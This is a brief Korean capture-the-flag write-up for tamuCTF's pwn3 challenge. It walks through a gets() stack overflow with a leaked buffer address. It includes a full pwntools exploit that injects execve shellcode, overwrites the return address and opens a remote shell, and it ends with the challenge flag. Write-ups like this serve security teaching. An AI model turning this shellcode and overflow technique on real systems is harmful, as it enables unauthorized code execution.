[tamuCTF] pwn3

이번엔 pwn3문제이다.

NX가 안걸려있으니 shellcode를 때려박고, ret을 변조해 shell을 띄우면 된다.

일단 코드를 보자.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(_bss_start, (char *)2, 0, 0);
  puts("Welcome to the New Echo application 2.0!");
  puts("Changelog:\n- Less deprecated flag printing functions!\n- New Random Number Generator!\n");
  echo();
  return 0;
}

또 echo함수를 호출한다.

int echo()
{
  char s; // [esp+Ah] [ebp-EEh]
 
  printf("Your random number %p!\n", &s);
  printf("Now what should I echo? ");
  gets(&s);
  return puts(&s);
}

죵말 재밌게도 s의 주소를 준다;; 

그래서 그냥 s에다가 shellcode때려박고 s로 ret을 변조하면 된다.

from pwn import *
p = remote('pwn.ctf.tamu.edu', 4323)
#p = process('./pwn3')
 
shellcode = '\x31\xc0\x50\xbe\x2e\x2e\x72'
shellcode += '\x67\x81\xc6\x01\x01\x01\x01\x56' 
shellcode += '\xbf\x2e\x62\x69\x6e\x47\x57\x89'
shellcode += '\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
 
pay = ''
pay += shellcode + 'A'*208
 
p.recvuntil('number ')
 
stack = int(p.recv(10), 0)
 
print '[*] stack : ' + str(hex(stack))
 
pay += p32(stack)
 
pay += shellcode
 
p.recv()
p.send(pay)
 
p.interactive()

익스플로잇 스크립트다.

굳

나머지 pwn4, 5 문제는 귀찮으니 내일 라업 써야겠다.

gigem{n0w_w3_4r3_g377in6_s74r73d}

pwn3